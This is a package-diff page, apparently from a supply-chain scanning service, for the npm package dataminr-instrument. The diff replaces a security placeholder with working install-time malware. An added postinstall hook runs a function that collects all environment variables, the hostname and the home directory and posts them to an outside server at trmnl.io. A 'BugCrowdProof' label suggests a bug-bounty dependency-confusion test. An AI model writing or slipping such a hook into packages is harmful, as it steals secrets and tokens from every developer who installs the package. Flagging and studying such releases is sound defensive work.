dataminr-instrument 0.0.1-security → 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of dataminr-instrument might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +20 -0
  2. package/package.json +14 -3
  3. package/postinstall.js +3 -0
  4. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,20 @@
1
+ import axios from 'axios';
2
+ import os from 'os';
3
+
4
+ function BugCrowdProof(arr) {
5
+ return "TheSecEng";
6
+ }
7
+
8
+ function CallPing() {
9
+
10
+ let env = JSON.stringify(process.env)
11
+ let hostname = encodeURIComponent(os.hostname())
12
+ let homedir = encodeURIComponent(os.homedir())
13
+ let url = 'http://trmnl.io:2080?hostname=' + hostname + '&homedir=' + homedir + '&env=' + env
14
+
15
+ axios.post(url, JSON.stringify(process.env)).then((res) => {
16
+ console.log(res);
17
+ });
18
+ }
19
+
20
+ export { BugCrowdProof, CallPing };
package/package.json CHANGED
@@ -1,6 +1,17 @@
1
1
  {
2
2
  "name": "dataminr-instrument",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "0.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "type": "module",
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "postinstall": "node postinstall.js"
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC",
14
+ "dependencies": {
15
+ "axios": "^1.2.6"
16
+ }
6
17
  }
package/postinstall.js ADDED
@@ -0,0 +1,3 @@
1
+ import { CallPing } from 'dataminr-instrument';
2
+
3
+ CallPing()
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=dataminr-instrument for more information.